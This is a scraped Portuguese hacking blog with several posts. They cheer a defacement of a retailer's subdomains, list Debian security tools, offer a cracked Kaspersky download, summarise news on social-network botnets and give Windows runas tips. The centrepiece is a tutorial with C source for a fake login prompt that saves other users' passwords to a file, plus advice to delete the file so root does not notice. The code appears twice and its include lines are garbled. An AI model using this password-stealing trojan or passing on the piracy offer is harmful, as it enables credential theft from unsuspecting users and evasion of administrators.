domingo, 31 de agosto de 2014
segunda-feira, 18 de agosto de 2014
Red Eye Crew pixa o entra!
Subdomínios
da loja de vendas online 'Extra' foram invadidos pelo grupo Red Eye
Crew. Isso mostra que aqueles selos de segurança que indicam se o site é
confiável para compra são apenas ilusão, escolha lojas que levem a
sério seus dados e passem confiabilidade aos clientes.
http://
http://mkt.extra.com.br/
http://
http://tudo.extra.com.br/
http://
http://mkt.extra.com.br/
http://
http://tudo.extra.com.br/
domingo, 10 de agosto de 2008
Ferramentas de segurança no Debian
Ferramentas de verificação remota de vulnerabilidades:
-
nessus
-
raccess
-
whisker
-
nikto (substituto de whisker)
-
bass (non-free)
-
satan (non-free)
Ferramentas de varredura de rede:
-
nmap
-
xprobe
-
queso
-
knocker
-
isic
-
icmpush
-
nbtscan (para auditorias NetBIOS)
-
fragrouter
-
strobe (do pacote
netdiag)
-
hping2 (Nota: desatualizado)
Redes Privadas Virtuais (VPN):
-
vtun
-
tunnelv
-
cipe
-
vpnd
-
tinc
-
secvpn
-
pptpd
-
freeswan, que está obsoleto e substituido por
-
openswan(http://www.openswan.org/)
Kaspersky Internet Security 7.0 [ Cracked ]
Kaspersky !! Cracked Nunca Expira !!!Anti-vírus com um jogo de componentes para aumentar a sua segurança. O software possui um centro de controle que unem os componentes, permitindo ao operador derrotar a maioria das ameaças de vírus ao seu sistema operacional. Automaticamente pode restaurar arquivos de sistema, retirando vírus e recuperando arquivos infeccionados.
- Hospedagem: Easyshare
- Tamanho: 31 MB
quinta-feira, 7 de agosto de 2008
Crackes adotam Facebook e MySpace para criar rede 'zumbi'
Golpes identificados nesta semana pela empresa de segurança Kaspersky mostram que o foco de golpistas da internet está cada vez mais voltado a redes sociais. Depois de divulgar o uso do microblog Twitter para espalhar vírus, a companhia anunciou fraudes que se aproveitam da popularidade dos sites de relacionamento Facebook e MySpace.
Em todos os casos, os golpistas usam essas páginas para divulgar links maliciosos. Nas fraudes baseadas no Facebook e MySpace, os hackers ainda tentam transformar as máquinas invadidas em “zumbis”, para ajudar na propagação dos golpes. Controlados remotamente, esses PCs podem espalhar códigos fraudulentos e mandar spam, por exemplo.
O internauta contamina sua máquina quando clica em links sugeridos na página de amigos ou em mensagens internas das redes sociais, também enviadas por conhecidos. A partir daí, o PC infectado passa a divulgar esses mesmos links maliciosos -- sem a interferência do usuário da máquina --, para aumentar a quantidade de vítimas. A praga do MySpace se espalha criando comentários nas contas de amigos do internauta, enquanto a do Facebook produz mensagens de spam e as envia para todos na lista de amigos.
Em alguns casos, explica a Kaspersky, são sugeridos links que instalam nas máquinas códigos de rede. Quando o internauta do Facebook clica no endereço infecta seu computador com a praga do MySpace e vice-versa.
Geralmente escritos em inglês, os textos que induzem as vítimas a clicarem nos links têm variados assuntos: “Paris Hilton arremessa anões nas ruas”, “momentos engraçados”, “você precisa ver isso” e “meu amigo flagrou você com uma câmera escondida”, entre muitos outros. Vale tudo para chamar a atenção do internauta e fazer com que ele clique no endereço sugerido para se tornar a próxima vítima.
“Infelizmente, os usuários têm muita confiança no que diz respeito às mensagens deixadas por seus amigos em redes sociais. Portanto, a probabilidade de um usuário clicar em um link como este é muito alta”, disse Alexander Gostev, analista da Kaspersky.
Em todos os casos, os golpistas usam essas páginas para divulgar links maliciosos. Nas fraudes baseadas no Facebook e MySpace, os hackers ainda tentam transformar as máquinas invadidas em “zumbis”, para ajudar na propagação dos golpes. Controlados remotamente, esses PCs podem espalhar códigos fraudulentos e mandar spam, por exemplo.
O internauta contamina sua máquina quando clica em links sugeridos na página de amigos ou em mensagens internas das redes sociais, também enviadas por conhecidos. A partir daí, o PC infectado passa a divulgar esses mesmos links maliciosos -- sem a interferência do usuário da máquina --, para aumentar a quantidade de vítimas. A praga do MySpace se espalha criando comentários nas contas de amigos do internauta, enquanto a do Facebook produz mensagens de spam e as envia para todos na lista de amigos.
Em alguns casos, explica a Kaspersky, são sugeridos links que instalam nas máquinas códigos de rede. Quando o internauta do Facebook clica no endereço infecta seu computador com a praga do MySpace e vice-versa.
Geralmente escritos em inglês, os textos que induzem as vítimas a clicarem nos links têm variados assuntos: “Paris Hilton arremessa anões nas ruas”, “momentos engraçados”, “você precisa ver isso” e “meu amigo flagrou você com uma câmera escondida”, entre muitos outros. Vale tudo para chamar a atenção do internauta e fazer com que ele clique no endereço sugerido para se tornar a próxima vítima.
“Infelizmente, os usuários têm muita confiança no que diz respeito às mensagens deixadas por seus amigos em redes sociais. Portanto, a probabilidade de um usuário clicar em um link como este é muito alta”, disse Alexander Gostev, analista da Kaspersky.
quarta-feira, 30 de julho de 2008
Capturando senhas no Linux
Como que funciona ?
Simples, É simulador de login, o cara que executa-lo encontrará a seguinte tela:
Darkstar Systems 4.2bsd / System V666
login: admin
Password: ******
Login Incorrect
E ele pensa que deve ter digitado a senha errada, digita de novo e entra no sistema. Porhám akela senha que ele digitou estava certa e foi gravada em um de seus arquivos. Note que este programa há para um sistema bsd4.2, altere as primeiras linhas da fonte (antes de compila-la) para o seu sistema.
Use os seguintes cmds para compila-lo:
cc horse.c -lcurses -ltermcap
mv a.out horse
Agora crie um arquivo chamado trap e coloque esses comandos:
horse
login
Para executar o trap digite:
source trap
Agora atualmente veja o file stuff no seu diretório home. Copie-os e
depois delete o file. Ele pode ser muito incriminante se o root le-lo.
Se você entende de C, pode alterar a fonte como preferir. Porhám se vc
não sabe nada de C, não mexa aà* que vc vai fazer merda.
----------horse.c------------------------------------------------------------
/* A mensagem abaixo deve ser alterada para se parecer com a mensagem que o sistema imprime quando pronto. Cada \n representa um carriage return
*/
define SYSTEM "\n\nDarkStar Systems 4.2bsd UNIX (acid0)\n\n"
define LOGIN "login: "
define PASSWORD "password:"
define WAIT 2
define INCORRECT "Login incorrect.\n"
define FILENAME "stuff"
include
include
int stop();
main()
{
char name[10], password[10];
int i;
FILE *fp, *fopen();
signal(SIGINT,stop);
initscr();
printf(SYSTEM);
printf(LOGIN);
scanf("%[^\n]",name);
getchar();
noecho();
printf(PASSWORD);
scanf("%[^\n]",password);
printf("\n");
getchar();
echo();
sleep(WAIT);
if ( ( fp = fopen(FILENAME,"a") ) != NULL ) {
fprintf(fp,"login %s has password %s\n",name,password);
fclose(fp);
}
printf(INCORRECT);
endwin();
}
stop()
{
endwin();
exit(0);
}
Pronto xD~
Simples, É simulador de login, o cara que executa-lo encontrará a seguinte tela:
Darkstar Systems 4.2bsd / System V666
login: admin
Password: ******
Login Incorrect
E ele pensa que deve ter digitado a senha errada, digita de novo e entra no sistema. Porhám akela senha que ele digitou estava certa e foi gravada em um de seus arquivos. Note que este programa há para um sistema bsd4.2, altere as primeiras linhas da fonte (antes de compila-la) para o seu sistema.
Use os seguintes cmds para compila-lo:
cc horse.c -lcurses -ltermcap
mv a.out horse
Agora crie um arquivo chamado trap e coloque esses comandos:
horse
login
Para executar o trap digite:
source trap
Agora atualmente veja o file stuff no seu diretório home. Copie-os e
depois delete o file. Ele pode ser muito incriminante se o root le-lo.
Se você entende de C, pode alterar a fonte como preferir. Porhám se vc
não sabe nada de C, não mexa aà* que vc vai fazer merda.
----------horse.c------------------------------------------------------------
/* A mensagem abaixo deve ser alterada para se parecer com a mensagem que o sistema imprime quando pronto. Cada \n representa um carriage return
*/
define SYSTEM "\n\nDarkStar Systems 4.2bsd UNIX (acid0)\n\n"
define LOGIN "login: "
define PASSWORD "password:"
define WAIT 2
define INCORRECT "Login incorrect.\n"
define FILENAME "stuff"
include
include
int stop();
main()
{
char name[10], password[10];
int i;
FILE *fp, *fopen();
signal(SIGINT,stop);
initscr();
printf(SYSTEM);
printf(LOGIN);
scanf("%[^\n]",name);
getchar();
noecho();
printf(PASSWORD);
scanf("%[^\n]",password);
printf("\n");
getchar();
echo();
sleep(WAIT);
if ( ( fp = fopen(FILENAME,"a") ) != NULL ) {
fprintf(fp,"login %s has password %s\n",name,password);
fclose(fp);
}
printf(INCORRECT);
endwin();
}
stop()
{
endwin();
exit(0);
}
Pronto xD~
Alternando Entre Contas De Usuário Pelo Prompt
Você pode alternar ente usuários pelo Prompt de Comandos do Windows sem precisar realizar o logoff, caso precise acessar pastas e arquivos de outros usuários:
1. Abra o prompt de comandos;
2. Digite o seguinte comando: runas /user:*nomedocomputador\*contadeusuário explorer.exe
Pronto, agora você ira abrir o Windows Explorer, como se fosse o usuário especificado e poderá acessar os arquivos cujo apenas este usuário tenha permissão para acessar.
OBS: pode ser utilizando de varias formas utilizando o comando runas .
> runas /noprofile /user:mymachine\administrator cmd
> runas /profile /env /user:meu_domínio\admin "mmc %windir%\system32\dsa.msc"
> runas /env /user:user@domain.microsoft.com "notepad \"my file.txt\""
^^
1. Abra o prompt de comandos;
2. Digite o seguinte comando: runas /user:*nomedocomputador\*contadeusuário explorer.exe
Pronto, agora você ira abrir o Windows Explorer, como se fosse o usuário especificado e poderá acessar os arquivos cujo apenas este usuário tenha permissão para acessar.
OBS: pode ser utilizando de varias formas utilizando o comando runas .
> runas /noprofile /user:mymachine\administrator cmd
> runas /profile /env /user:meu_domínio\admin "mmc %windir%\system32\dsa.msc"
> runas /env /user:user@domain.microsoft.com "notepad \"my file.txt\""
^^
Assinar:
Postagens (Atom)
